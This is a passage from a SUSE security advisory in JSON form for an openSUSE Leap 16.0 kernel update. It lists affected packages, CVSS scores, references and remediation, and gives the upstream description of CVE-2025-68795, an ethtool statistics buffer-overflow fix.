"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68792"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
